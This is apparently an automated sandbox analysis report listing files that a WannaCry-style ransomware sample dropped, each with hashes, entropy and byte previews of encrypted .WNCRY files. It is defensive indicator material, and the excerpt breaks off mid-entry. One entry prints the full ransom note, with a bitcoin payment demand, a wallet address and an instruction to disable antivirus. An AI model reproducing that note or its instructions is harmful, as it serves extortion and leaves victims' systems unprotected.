                                Entropy (8bit):7.809166067084224
                                Encrypted:false
                                SSDEEP:24:bklcKfOFM03WGa22NCL+Dd09Za3LT7o6t7fpIYG0r9jWe6MmNzbd87bkh:bk6kOSK+NNCL+y9k3LT7o6t7fplGYFWb
                                MD5:A83CEFFD4E1098A9D51122589DB31741
                                SHA1:1DE543C049B24A3A4F4B5BECCE0724BE2D18255B
                                SHA-256:B96A34917FE3216CC7D006DF16BB77CE128B37D78429635F80D5BAAE187E2553
                                SHA-512:DBC193D79D61375DF7F0DD44D70D9A9FB763564D6895BA6D57B9DA082A12188AABFE8A0C4119DF6D92ABBEC49A0A66A5FDBE1B0B97E1848D948CD62AB47B6EE0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....n+.v......0....+1..a...#......H..wN..Dm...1..J..=m^.J..f..1.d.B..AZ.gP_.......B..YN6.. g.)....yed..X."5o.S.wp.N.1X.AV.T...*i^N.d.)...D8.(Y.o%...X.sZ.u..M[..P....~.....x.[R....=........2.`........0V...R...5w./N|w..V..G.RO....H..04g..Ku@.(...2.............L..>R;.?.7...3....A.Ml..........B.C....5$....'...$.cVIK.l...Ai..-..ym!..\.+...9..:r.Y..a...YC..;E.V.u...G.$......4].3..\x.pm.H.`_.w(x.X...0.dd....R.G.v.=...k.D4.~..Z...g.bh..!....?........Z.[...#.i2P.D....{6..%zChe..o*.}"f\..t\.....{G\p...2.MQa1._....GhQa.lH..tFw..gL..j..K....-.>....=x....u....t]yE.g$5...TsV.cR...B.1..r!y.G.].?^>.4~.1....e.h...d....Be.d5.;MF.)\...........5h!3.B....Ua1.&A....<B.Q.[B......g..F..BkjB...`..l......."@D".w./.E......#\..$].ZiBg..n.......*..[x..r...I3...&a:..I&#..]PT.........2<.....I..=.uV...q.:_^......$M......^....e]y...<......p.....>.<%..AR0.$..Il9...W..%E..k.'x.a+...o...;?.`..rY.l...` ...r..@.....I.l.3.l..dycy.W.D..d..83JkE...9JBV.(.LoyS..s..4.6V=

                                C:\Users\user\Desktop\EEGWXUHVUG.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.809166067084224
                                Encrypted:false
                                SSDEEP:24:bklcKfOFM03WGa22NCL+Dd09Za3LT7o6t7fpIYG0r9jWe6MmNzbd87bkh:bk6kOSK+NNCL+y9k3LT7o6t7fplGYFWb
                                MD5:A83CEFFD4E1098A9D51122589DB31741
                                SHA1:1DE543C049B24A3A4F4B5BECCE0724BE2D18255B
                                SHA-256:B96A34917FE3216CC7D006DF16BB77CE128B37D78429635F80D5BAAE187E2553
                                SHA-512:DBC193D79D61375DF7F0DD44D70D9A9FB763564D6895BA6D57B9DA082A12188AABFE8A0C4119DF6D92ABBEC49A0A66A5FDBE1B0B97E1848D948CD62AB47B6EE0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....n+.v......0....+1..a...#......H..wN..Dm...1..J..=m^.J..f..1.d.B..AZ.gP_.......B..YN6.. g.)....yed..X."5o.S.wp.N.1X.AV.T...*i^N.d.)...D8.(Y.o%...X.sZ.u..M[..P....~.....x.[R....=........2.`........0V...R...5w./N|w..V..G.RO....H..04g..Ku@.(...2.............L..>R;.?.7...3....A.Ml..........B.C....5$....'...$.cVIK.l...Ai..-..ym!..\.+...9..:r.Y..a...YC..;E.V.u...G.$......4].3..\x.pm.H.`_.w(x.X...0.dd....R.G.v.=...k.D4.~..Z...g.bh..!....?........Z.[...#.i2P.D....{6..%zChe..o*.}"f\..t\.....{G\p...2.MQa1._....GhQa.lH..tFw..gL..j..K....-.>....=x....u....t]yE.g$5...TsV.cR...B.1..r!y.G.].?^>.4~.1....e.h...d....Be.d5.;MF.)\...........5h!3.B....Ua1.&A....<B.Q.[B......g..F..BkjB...`..l......."@D".w./.E......#\..$].ZiBg..n.......*..[x..r...I3...&a:..I&#..]PT.........2<.....I..=.uV...q.:_^......$M......^....e]y...<......p.....>.<%..AR0.$..Il9...W..%E..k.'x.a+...o...;?.`..rY.l...` ...r..@.....I.l.3.l..dycy.W.D..d..83JkE...9JBV.(.LoyS..s..4.6V=

                                C:\Users\user\Desktop\EEGWXUHVUG\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Desktop\EEGWXUHVUG\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.797593287627818
                                Encrypted:false
                                SSDEEP:24:Qe3Lwqwyr9demoQBnSeDKsmcWdC2H0mtCLsh/cO+4yYjX9I3bPjlj:ji4e4+AWdC21gG+vYjMbPjZ
                                MD5:8E2C32EA0DF2819DFEE0939E763A8DBB
                                SHA1:3C70BE2622670B37C07CF4CA9330ADC2E14714EF
                                SHA-256:510FA14834BDB89F1D30A7A8CA7CC29E08CC2F479AEF1D2337D15EB3CE251D5E
                                SHA-512:51D0830DA4BA7D1FDAC35B6AEB315E25F6B264931A5A0D672C74F322C381910DBCCAD39B07B16D029FB480C41A7BC67724EC0595EE5691CE5475959F0A5BF3B3
                                Malicious:false
                                Reputation:unknown
                                Preview:I.J.M.[.scn.[..=...t.e.......8s...r....L\+)"...F!.lY^.t.?z.o..@..yn...4..s[%.../...y5.x".*}6)t.9..u.b.m.$9..4..$.@......se(.......".f5.%....>.yK.S.p..).L.i|.O.P..3....n...*.T.?..`.B&.:......K..+A...s..Y..j.rT...5.s&.N...)..}..-$.:.<..~a..c/..$...A+.i...'..mY.(......@JR....:.:..To...{...P...-}.:.Hw...p.....jl.UE../X.*.)..M..D..B...{)b%..(....c6......:ob.6.p1.os..-.|;Z+R.......Q.8c?.L|..<.6`.L`.=..2.....x....b.?9.n.q...D..C^.Hy..2.?../zi.CK.I_...b../H.nk....<...VH'...yx.0:.JU._wH....r......w........)..q............yB.o.....U<.w...q.....R..SnI....7.....V....sY.C/...9.SE....d/Q>...6.ZZ...0.._...v.DUI.c...I.$#..Lp4.....L.K.~D.....xQj.....j..]....5sO....~cF.z....0.......^k=w.W+...[..\...|..k.a...C.>.t.j..5...s:O...F...2..........*.LC.r..4/iV<....sa.Ai.Jm.....p.u2P.4.!.al....vcKP...K....6....s..r*......mU&.....2e...!Q.~.............H.....{.........r..3z..[...P...s.H......\....O=.F...H...}.GZT....<.8..8..*5.}.V.U...^8y...qNY...D.:..P.....

                                C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838560212151303
                                Encrypted:false
                                SSDEEP:24:bk4Y1mu/rGu+UD0k+QYq0Ql1/fyhd3UUGcuB2673GWBQejO3Zi3Z:bk4Y1mCyuPAk+QYTQlJIdKcuv3PLb
                                MD5:2DF793EED7E120797D5EF9CA06DE83BD
                                SHA1:A3001D1AF96B6392D88E7AE7129B00B95F2B73A4
                                SHA-256:A22291F5F9639E818C052A31B97C26A1B9666E4D89985AD4E534296B849FCEE3
                                SHA-512:B3B4DCC237B638F3673ADEFA41ACC0521F6967FEEF0C2DCCB0800FCD18F18D58E41DF6443DA06BB5D70F36AF555348AE2EDCFE13ACF83F491397A7B009355ADA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....q\{[u,..C............0a(..u......... D..9...b..7 u.O?...K..K3.'.g`....../..pu}..v..+.1..q...l.d.m/..G...w..v.Bm..$....U.U.[).d...y5...d.2.I.8U...o.}.....WwR#._....]......ha....3......Xp..=..0.ay..........7... .GtW..oZ..9.a.G......i.........................!.:.\i'~W1.S..Q.!...->.E.....6.h.ucf.W........h*...s%....2...X...c..c.'._.v..!6X...5.:6.i..*E.p......~.B.8..0..|".U.....{L=.Y./.!.U!s...b.... .B.p...{.N.gE.........5z.....(..+..(:..........DT5..M.c.G....S.ouC...$.Zr..P6..F#9&Ui8p...0.,....I..X...>.....&.ygz..9 .^...x.<...1o.+.\Ov..C.$.yif......N$........13..9.....d.!.8jK....[^!g/`;.......E...>+r..y..(..h..-~..:<..Q...(fu&.z.....:>A^4.(.....n...P;.q....r.....Y....d.r...H...]{.q..V..r.D..d(.n.....E.;B.+.+...j..).0.%..EbT.:..[..U....u.....I*...Dy.f.D.2~.........).wN.Kx.i;*.Gw|.y......K../fJPE2...U..KZ..;lK?b\Tp....._.<....T.g.r'...Lv].-.,f.1.u2...........E.^..r..mtV...y....K.H.."..v..>.`b...L~Cb.(z=:..sp|....O......... ..I.3

                                C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838560212151303
                                Encrypted:false
                                SSDEEP:24:bk4Y1mu/rGu+UD0k+QYq0Ql1/fyhd3UUGcuB2673GWBQejO3Zi3Z:bk4Y1mCyuPAk+QYTQlJIdKcuv3PLb
                                MD5:2DF793EED7E120797D5EF9CA06DE83BD
                                SHA1:A3001D1AF96B6392D88E7AE7129B00B95F2B73A4
                                SHA-256:A22291F5F9639E818C052A31B97C26A1B9666E4D89985AD4E534296B849FCEE3
                                SHA-512:B3B4DCC237B638F3673ADEFA41ACC0521F6967FEEF0C2DCCB0800FCD18F18D58E41DF6443DA06BB5D70F36AF555348AE2EDCFE13ACF83F491397A7B009355ADA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....q\{[u,..C............0a(..u......... D..9...b..7 u.O?...K..K3.'.g`....../..pu}..v..+.1..q...l.d.m/..G...w..v.Bm..$....U.U.[).d...y5...d.2.I.8U...o.}.....WwR#._....]......ha....3......Xp..=..0.ay..........7... .GtW..oZ..9.a.G......i.........................!.:.\i'~W1.S..Q.!...->.E.....6.h.ucf.W........h*...s%....2...X...c..c.'._.v..!6X...5.:6.i..*E.p......~.B.8..0..|".U.....{L=.Y./.!.U!s...b.... .B.p...{.N.gE.........5z.....(..+..(:..........DT5..M.c.G....S.ouC...$.Zr..P6..F#9&Ui8p...0.,....I..X...>.....&.ygz..9 .^...x.<...1o.+.\Ov..C.$.yif......N$........13..9.....d.!.8jK....[^!g/`;.......E...>+r..y..(..h..-~..:<..Q...(fu&.z.....:>A^4.(.....n...P;.q....r.....Y....d.r...H...]{.q..V..r.D..d(.n.....E.;B.+.+...j..).0.%..EbT.:..[..U....u.....I*...Dy.f.D.2~.........).wN.Kx.i;*.Gw|.y......K../fJPE2...U..KZ..;lK?b\Tp....._.<....T.g.r'...Lv].-.,f.1.u2...........E.^..r..mtV...y....K.H.."..v..>.`b...L~Cb.(z=:..sp|....O......... ..I.3

                                C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.83354903957755
                                Encrypted:false
                                SSDEEP:24:GtwVnN2yO3IaZHxTu0/1NS08de5HvYAxsWjGOAxEg:nVNi3IaVxb4+DGzxEg
                                MD5:E2099EDA47B2EB1CB2D4442C3131FAB5
                                SHA1:37264F0B9F133220D96082383517AFB19E4254B5
                                SHA-256:7A755E56985124B024D5579B7BF9C2FF387BFDECA351110D220ABCDD6C891606
                                SHA-512:5A6C1D1C24752E516E250FE6757F2D6B0155D3DECF16454D0613F062AD7735652FD2E61D21BA8F0B589B87C14B64C1ACF7965F5EFE4388DF6127DDEFBFB5AE27
                                Malicious:false
                                Reputation:unknown
                                Preview:\$_...~....?]k.....2._9.~.=.K....@.]..hu......Q.SP.....x+6.O.c.Xx.F.w......d2..#R...2C".......].0.G..6...p3Kt.g..O..!..GSZ_H.z.B. .._U..........v./7$K.gW..u7.s..f.X..)..C.St.Cg...4n.. ....q.'.7.,./......-..V..+......G3.Y....[..|<.K..._o..#.....i=...'..Qj.n yz...`.]...N#".w....K.|o.....(.Z.U....f..U.`..,X..Z1.Q.2.Hr+..)....m...Q.v........p/......?][....E...i.*..>....{.`;...b].A......u.!..N.`6...R..jea....[.....Txb..g\.......x]....Wq...'.4.\)}aD.s\.....X9N.`.dI....<:..p..E.VH'._..uA...CZ.7....v...l.q1;{w4.?.j*.n...nFJ.A../v.`.!N.`.gX..\.*...1....6...4.'85.KP....".T.G>V'..y.B..$.@..............Vn.....T_..t+....a.Sd\....@M0.!.2v...R......X.}..^..>.x..v.Rp..st5....oE..s\P.j.........`.d.....P.,.}....t%vE....0..3...V........n..%...\...&......@vn.J.#..p.|....uv..q.Ni.v.U........L..R...2R."/.....L.e5oQk0.. ....Nc".,.l/n.....w.D...}/.\...na7..?...@'....$wO..|f5eV....]m. .....d.......Sa..gB...R......&.Nj....2.L4.+6.......x.~.S...o.m9I.^.....VbF.+.,

                                C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843810693250143
                                Encrypted:false
                                SSDEEP:24:bkmBF93xchgaSjWlUEP0HLkqL5xvmx2hZXYCyzOtP/TBGBfu83f88IZ:bkwSSjj+P0Hpxe6YA/I5IZ
                                MD5:69D5C55CA2078254961237D960EE1B22
                                SHA1:FFFA8758D065F282691BBDC11940FBA244AC78EB
                                SHA-256:2CB595A4837C63BFEE70523AD52C93F73A0575752BDF0674AD8E3F1EB346B3C7
                                SHA-512:87F013F912288DB0D066D9401C400CD9BF48A6CD3891381A99502D51854D687986C699B72A8DC1211EC30F744E3DC51D1E908D2CB3415F3D3DC1CBE8002D3018
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....~..eP"..Fo...HW%*........)..s..3..H.F...k.Z~..q.,.B.V.2..K......t.2...L@..8..B0..`.....;V...h..I.L$......o..k..9-....R.]b.2.:...8.e..M.r...Wbf2!.>~SB.v....*.D.].OeZl[..rxYj@W.....{._Wi.?...7u.&.9........vQ.v.].R.Lo..gY..%...lcy}.3....^G5.1"(....x.My?............2.F...3i9.G..3....&v%....~..B..]w._..!..........-.F...R..F..\f...Z.XK..@...y._....8".~..(...-..0...._.I..u....h.k%...".D..}2.n%..6x.I.s#...c...1F.P..X...9"..j......"..a...z.........H....xaO.=.c....&t..?.t....$..V.R..\N8....W..V`..u.\.`N.,:f...k...f....Z..I.t......:.[.}...Du.3.[&..........N...V.A...|...Ct..)......(..ql..,...A3".2.!...wSrW91........-+.o..;G.p...(.......Q..!...........Y'#..q..O..m.x(t.".D...u.....2.y/..........9.&.H.U..fn....N.'..N....M..m9.E.s..s>..z.......B.....=)CK{...%..........9....d$.v..Q..b.-CL.E....a...$...f..@..&...G...!.....{...(Q.%d*.k...d...i.J.S.D\L...i..=..\vF3..b.t..%.....y...".W.i.....R....Z#..G.7I..u3...,......;....DA.P\....t./.....

                                C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843810693250143
                                Encrypted:false
                                SSDEEP:24:bkmBF93xchgaSjWlUEP0HLkqL5xvmx2hZXYCyzOtP/TBGBfu83f88IZ:bkwSSjj+P0Hpxe6YA/I5IZ
                                MD5:69D5C55CA2078254961237D960EE1B22
                                SHA1:FFFA8758D065F282691BBDC11940FBA244AC78EB
                                SHA-256:2CB595A4837C63BFEE70523AD52C93F73A0575752BDF0674AD8E3F1EB346B3C7
                                SHA-512:87F013F912288DB0D066D9401C400CD9BF48A6CD3891381A99502D51854D687986C699B72A8DC1211EC30F744E3DC51D1E908D2CB3415F3D3DC1CBE8002D3018
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....~..eP"..Fo...HW%*........)..s..3..H.F...k.Z~..q.,.B.V.2..K......t.2...L@..8..B0..`.....;V...h..I.L$......o..k..9-....R.]b.2.:...8.e..M.r...Wbf2!.>~SB.v....*.D.].OeZl[..rxYj@W.....{._Wi.?...7u.&.9........vQ.v.].R.Lo..gY..%...lcy}.3....^G5.1"(....x.My?............2.F...3i9.G..3....&v%....~..B..]w._..!..........-.F...R..F..\f...Z.XK..@...y._....8".~..(...-..0...._.I..u....h.k%...".D..}2.n%..6x.I.s#...c...1F.P..X...9"..j......"..a...z.........H....xaO.=.c....&t..?.t....$..V.R..\N8....W..V`..u.\.`N.,:f...k...f....Z..I.t......:.[.}...Du.3.[&..........N...V.A...|...Ct..)......(..ql..,...A3".2.!...wSrW91........-+.o..;G.p...(.......Q..!...........Y'#..q..O..m.x(t.".D...u.....2.y/..........9.&.H.U..fn....N.'..N....M..m9.E.s..s>..z.......B.....=)CK{...%..........9....d$.v..Q..b.-CL.E....a...$...f..@..&...G...!.....{...(Q.%d*.k...d...i.J.S.D\L...i..=..\vF3..b.t..%.....y...".W.i.....R....Z#..G.7I..u3...,......;....DA.P\....t./.....

                                C:\Users\user\Desktop\EEGWXUHVUG\GLTYDMDUST.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796914217785424
                                Encrypted:false
                                SSDEEP:24:I4by4xaIU/vDoL4ICopsP26kV6ZrxYOOrjgm35RHtnD/uKVXzJu9EKMNC0U:IGyfZTRICcqR5ZSngsftaKVXEWbNC0U
                                MD5:44BC996846993CFDBA52B7D5376C7A05
                                SHA1:8B247D2D30C83B2287071CC644EF96D94E15B146
                                SHA-256:5ED6EF496DC692CBA9E4882E8C4F292DE29C3327CF5255B2E85274617F4848DD
                                SHA-512:B201031B83BA9A702E3CF111005A1E988EAE9B6EEB7C9FD75EDB054E2496A1F057F56A44BDB710C5A4B0FDAEA7CC21672D027FF68D9FD9DC634816718676DCB1
                                Malicious:false
                                Reputation:unknown
                                Preview:.|B...I.+.AOB...:3..?.or.2xp.F.A...X..7........`.o.LK.6.....y.n.^..S...].w..K`.-...9...xs.L..hUJ.(...wo....qF^..,^....H.<|..:]..9L$3..U.h........#-..y..h...0v..U....H.#.l....RR...A..?.._.0....k..4*..[OS.5...$2.f..8...P?...,D.F'."k.....l......j'.P..J.........-8.()...8.._..{*......5...._.?....G..s.;..q..\.&.C .s\..H.D.A..q.j..:/.....W......d@'.*=......v*....I....%(...m=....;.fB..&..H.p9s...K=S...~.Y...8..p..Vc..2J...N.`...{R.D.Xch......&...Wo.,.|as/..O.\.6.....rA.X....Uu....o..+.v....F..uS...*.S.+...D...L..4..Ef..*.Q.(.hc..<Q.~.Eb..O...o..f....h@..4...g.... ...W[....\.._..`....<;..vL..-...+.}.A..N........=#!.Nw.!.A...L..[.,?.Q/..()ji.GZ.A..n~*...e.......ECn...."...X7j...Gf..D..1}.L...D..A..D......[...&.E%.THC.!h..!......0#!.3.:......3....y.g.._.'..L.O.H.e...#.,8I..^<..J.'..3A.n*=9....#...>.....h..c..NPTE.....r,Ix...&.E.E....h....R...3Ab..i....Ti.....D..J...3.^....."0.^#...P...+.q0...........Q..s..Z0.o.....elol..L.=.@.C.9....~.....g(.

                                C:\Users\user\Desktop\EEGWXUHVUG\GLTYDMDUST.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.85706292274075
                                Encrypted:false
                                SSDEEP:24:bkGZ7kH067siOKeE9gtvO1S9naDgdIfXl6rkz0tJDjstRmT2iV6xLwckSH:bkekUksi7n9g81Ka8dI3Oe61V2LwE
                                MD5:1B42A874189D57FD31CF46C0A739578B
                                SHA1:2A20525A31A548D8D7CB955D739429E6BA147FC0
                                SHA-256:37A2C2EE9A01CB6C7331B4B3166D4DF2A44B8EBB16E358FA5EB4AD2E838DB5A2
                                SHA-512:691BEC558336791DBF1BBF8660D26E46A4D3CD8F95E22FF132DA4758F6C5247A07C21BAA44AADC769D65203866402F5849D67C5A7DCC347208176DC10EE28AAF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......4..cq.@n.,K.....^..Y..@..:04..E:."1..D...5..%.....W]9..@i..;\..f.#..... 5....q|V..RN]...."0....R.n...~.I.0^.y/..bdG.N5..d.4.%.0...#.2........B.PK..#....#...++.. .V..<)....;0.[f..l.bl4.+...Q<.l......O.m..}.9I.8...d'A@.\...x...ZH.....R..A..<..............;U.cx.....XN"../.../rsw1.O.(.}..<..s......W.P%.{*.Go.h..$.e..}B..xf;,...R.. .tA..l..h.z.....o..6.8.h.c.#...4.x.y..<[...>...[.?9..HH..K.>....f.2.D..M..........s.=.n..&4../J..Y..4..&C.... .n#...U...3.......:....4a8._...o...5..=.^j.r....Z..7y.!Oo.1..>.....x.5.r.Nj|;.]...G}.Y.nFAY.....{..YR......../.....K..wC.|.x.nV?.[[....n.8yoO..Hx.$.ZD-.AO...0.<..#bKq.E.:.c.B.`..V..*.G>....-3.;...2.g.%.z..C...f=.j"......{..+...,I..HS%....~x.(.w....v:..wZ]..PQ.....F...?B.k...*V...>..{/]#....S......+..,y.%...0..ng.i...?..)....:c....A....sB....pv.lSv..!u..JXx...2C.w8.|sE..c.....b.....O..v.J.~.M...b|../..^.'..G.o.dQ. .....".zQ^i.q...Y.I=!....J/.....9..Q.X..:....-..~.p._....Z..Z.*..(Q..h.@:Gl.hZ.9

                                C:\Users\user\Desktop\EEGWXUHVUG\GLTYDMDUST.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.85706292274075
                                Encrypted:false
                                SSDEEP:24:bkGZ7kH067siOKeE9gtvO1S9naDgdIfXl6rkz0tJDjstRmT2iV6xLwckSH:bkekUksi7n9g81Ka8dI3Oe61V2LwE
                                MD5:1B42A874189D57FD31CF46C0A739578B
                                SHA1:2A20525A31A548D8D7CB955D739429E6BA147FC0
                                SHA-256:37A2C2EE9A01CB6C7331B4B3166D4DF2A44B8EBB16E358FA5EB4AD2E838DB5A2
                                SHA-512:691BEC558336791DBF1BBF8660D26E46A4D3CD8F95E22FF132DA4758F6C5247A07C21BAA44AADC769D65203866402F5849D67C5A7DCC347208176DC10EE28AAF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......4..cq.@n.,K.....^..Y..@..:04..E:."1..D...5..%.....W]9..@i..;\..f.#..... 5....q|V..RN]...."0....R.n...~.I.0^.y/..bdG.N5..d.4.%.0...#.2........B.PK..#....#...++.. .V..<)....;0.[f..l.bl4.+...Q<.l......O.m..}.9I.8...d'A@.\...x...ZH.....R..A..<..............;U.cx.....XN"../.../rsw1.O.(.}..<..s......W.P%.{*.Go.h..$.e..}B..xf;,...R.. .tA..l..h.z.....o..6.8.h.c.#...4.x.y..<[...>...[.?9..HH..K.>....f.2.D..M..........s.=.n..&4../J..Y..4..&C.... .n#...U...3.......:....4a8._...o...5..=.^j.r....Z..7y.!Oo.1..>.....x.5.r.Nj|;.]...G}.Y.nFAY.....{..YR......../.....K..wC.|.x.nV?.[[....n.8yoO..Hx.$.ZD-.AO...0.<..#bKq.E.:.c.B.`..V..*.G>....-3.;...2.g.%.z..C...f=.j"......{..+...,I..HS%....~x.(.w....v:..wZ]..PQ.....F...?B.k...*V...>..{/]#....S......+..,y.%...0..ng.i...?..)....:c....A....sB....pv.lSv..!u..JXx...2C.w8.|sE..c.....b.....O..v.J.~.M...b|../..^.'..G.o.dQ. .....".zQ^i.q...Y.I=!....J/.....9..Q.X..:....-..~.p._....Z..Z.*..(Q..h.@:Gl.hZ.9

                                C:\Users\user\Desktop\EEGWXUHVUG\KLIZUSIQEN.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8008989769724195
                                Encrypted:false
                                SSDEEP:24:wrd13fGPdKgrvloWlaO0kbJR++CKrU7h7wYLk/cF9:w3ngrJEkbHE+UdMYsM9
                                MD5:5E6B73BF9010DB9F5CBC68A273A85B66
                                SHA1:F11431C6EBA416608F412A0CB5EB739C57D3C344
                                SHA-256:58154789B389BA364622873661907F5C9C5D73793702B0D5665525FF5CC9C4AB
                                SHA-512:FEB589BC02C76FCBD0243FEC47BBD0A080E0BEA0557703FBEAEF7879B659A8C163E5893E8EF7A5E99B536DBFF0470A32F0FC9684696220A32D56F7EDC90E2790
                                Malicious:false
                                Reputation:unknown
                                Preview:MY.4{y..0.).z.XP....W.]z1.....(."..........#NQ..-.B.-..R..H./..0.......C.C.>..a..._..3..........U1...y.X3Q.6...v................K..!..F_..r.........^.-.....,.hS.8fE..;__.{.u.1.5...)..!...xj...[M..".9h.......@..H......;....6.H..e...,...._()}.w7.B'8%.bP2BR\c...^.U.....l.H.G.v...w.]..4]..=".|......@...;.!..}..d%..!.y.2G_]......._...t]m...|.,.6z.......n.K......<.6 .`.....)..I.$..(........pQ.d..].jB..%4...<.[-..DZ..1nl.&.U.=.....y.]..t.6..J".K.,YG.4..1..=)8[...z".+.Hd.....).e.v9:..z.}....J%.b\0.p.q....&.dO...5..."v...`.X.."6S ..Q...<I)OMt..M......H...1.=.....Uc..@.f|.l..>fV........e...%Umr.G/.?^...K....1.....sd.?..F...i+z.H...Q.............7[......[..$W.p..\....k.nU..L.|..2w^\..:...8{..'..........0#...&...M..>".....C.!#.t........n..3'.........T...m.uf......j4..w.6....c...x[L..]....^....=..0....Z..e...Z4.....A.m.8.../I.8..,.j.O@.*....~1L..N..9 .H.ut"-......\..(.<.}9.h.R...*f..e/.,8R8.@.m..^'ZOR.r..d8.YO.c...(..h._S...-@./e..j.r..'.....G.*

                                C:\Users\user\Desktop\EEGWXUHVUG\KLIZUSIQEN.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.845997200646745
                                Encrypted:false
                                SSDEEP:24:bkddBWKj7YxrKatpYwLY9xeELzaPoJAUiZcSaoL7dU2yReTUHow3xeBwBYIA:bkMKv6u6pYsKL2PqZinLI4TUIw3xe8Yp
                                MD5:1F775F4A8934A7D95D3BDC73F7C437B7
                                SHA1:1307B2ECF1CE5CAF273604A71D514CCE2436A170
